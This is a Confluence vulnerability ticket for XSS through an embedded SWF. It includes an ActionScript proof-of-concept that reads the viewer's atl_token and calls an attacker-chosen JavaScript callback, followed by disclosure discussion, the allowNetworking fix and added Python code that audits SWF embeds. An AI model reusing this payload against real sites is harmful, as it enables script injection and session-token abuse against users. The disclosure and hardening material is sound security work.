In the Confluence comment module a user can embed an SWF file in their comment. Confluence uses an `atl_token` parameter on the GET HTTP request, so if the attacker sends the link of the .swf file (the value of src on the embed tag) to his victim, the malicious .SWF won't execute in the victim's browser.

We can bypass this protection by using this.loaderInfo.parameters in the malicious .swf; this.loaderInfo.parameters.parameter_name extracts the value of your target parameter, in this case atl_token. I also inserted an <a> tag in the malicious swf file, so if the victim clicks the link in our embedded swf file, the .swf file will be run in the victim's browser.

PAYLOAD

package
{
    import flash.display.Sprite;
    import flash.text.TextFormat;
    import flash.text.TextField;
    import flash.external.ExternalInterface;

    public class Main extends Sprite
    {
        public function Main()
        {
            super();
            var myFormat:TextFormat = new TextFormat();
            myFormat.size = 200;
            // Read atl_token from the SWF's own query string via loaderInfo.parameters
            var xcode:String = this.loaderInfo.parameters.atl_token;
            var myText:TextField = new TextField();
            myText.width = 1000;
            myText.height = 1000;
            // Render a link back to this SWF with the viewer's own token appended
            myText.htmlText = "<font size=\'300px\'> <a target=\'_blank\' href=\'https://pwnie.ninja/confluence/download/attachments/9469955/NewProjectx.swf?atl_token=" + xcode + "&callback=alert\'>CliCK ME</a> </font>";
            addChild(myText);
            // Call the JavaScript function named in the callback parameter
            ExternalInterface.call(this.loaderInfo.parameters.callback, "xss");
        }
    }
}
      
      

[CONFSERVER-38127] xss by swf file

David Black added a comment - maradrianbelen please wait at least two weeks after Confluence has officially released 5.8.6 before removing the security restrictions on this issue.

adrianbelen NA added a comment - Looks like this is OK: https://www.adobe.com/devnet/flashplayer/articles/secure_swf_apps.html#articlecontentAdobe_numberedheader_1

David Black added a comment - edited - According to http://help.adobe.com/en_US/AS2LCR/Flash_10.0/help.html?content=00000463.html & https://www.adobe.com/devnet/flashplayer/articles/secure_swf_apps.html#articlecontentAdobe_numberedheader_1 we need to set allowNetworking=none to fix this problem.
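As an added example (not part of the ticket or of Confluence's own code), a Python check for the mitigation David Black names above: it audits rendered comment HTML for SWF <embed> tags that lack allowNetworking="none" and shows how an embed's attributes are forced to hardened values. The allowScriptAccess="never" setting, the function names and the sample HTML are my own additions and constructed.

```python
from html.parser import HTMLParser

# Settings enforced on user-supplied SWF embeds. allowNetworking="none" is the fix
# named in the ticket (it blocks browser navigation and ExternalInterface calls);
# allowScriptAccess="never" is an extra hardening added here, not from the ticket.
REQUIRED = {"allownetworking": "none", "allowscriptaccess": "never"}

class EmbedCollector(HTMLParser):
    """Collects the attributes of every <embed> whose src points at a .swf file."""
    def __init__(self):
        super().__init__()
        self.embeds = []

    def handle_starttag(self, tag, attrs):
        if tag == "embed":
            a = {k.lower(): (v or "") for k, v in attrs}
            if a.get("src", "").lower().split("?")[0].endswith(".swf"):
                self.embeds.append(a)

def audit_swf_embeds(html):
    """Return [(src, {attr: required_value})] for SWF embeds missing a setting."""
    collector = EmbedCollector()
    collector.feed(html)
    findings = []
    for a in collector.embeds:
        missing = {k: v for k, v in REQUIRED.items() if a.get(k, "").lower() != v}
        if missing:
            findings.append((a["src"], missing))
    return findings

def harden_embed_attrs(attrs):
    """Return a copy of an embed's attributes with the hardened settings forced on."""
    out = {k.lower(): v for k, v in attrs.items()}
    out.update(REQUIRED)
    return out

def render_embed(attrs):
    """Serialise attributes back into an <embed> tag (values assumed attribute-safe)."""
    return "<embed " + " ".join(f'{k}="{v}"' for k, v in sorted(attrs.items())) + ">"

# Constructed sample of rendered comment HTML (not from the ticket): one weak SWF
# embed, one already hardened, and a non-SWF embed that must be ignored.
SAMPLE_COMMENT = (
    '<embed src="/download/attachments/ATTACHMENT_ID/demo.swf?atl_token=TOKEN_PLACEHOLDER"'
    ' allowScriptAccess="always" width="400" height="300">'
    '<embed src="/download/attachments/ATTACHMENT_ID/ok.swf"'
    ' allowNetworking="none" allowScriptAccess="never">'
    '<embed src="/images/logo.png">'
)
```

Running audit_swf_embeds on SAMPLE_COMMENT reports only the first embed; passing its attributes through harden_embed_attrs and render_embed yields a tag the audit accepts.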

adrianbelen NA added a comment - Confluence 5.7.4

Minh Tran added a comment -

Dear maradrianbelen,

Thanks for submitting the ticket.
Would you please let me know which affected version of Confluence you met this issue on?

Thanks,
Minh Tran
Confluence BugMaster
Atlassian

adrianbelen NA added a comment -

Upload the swf file first in the attachment, then embed the swf file.

Click the flash file; normally this is *not* allowed because the atl_token is unique for every user.

Here is some video: https://www.dropbox.com/s/hd08iq21fv5bnbb/xss%20of%20the%20dig_x264.mp4?dl=0

Sample (click the embedded flash): https://pwnie.ninja/confluence/display/IKB/IT+Knowledge+Base?focusedCommentId=16384021&refresh=1434446493103#comment-16384021
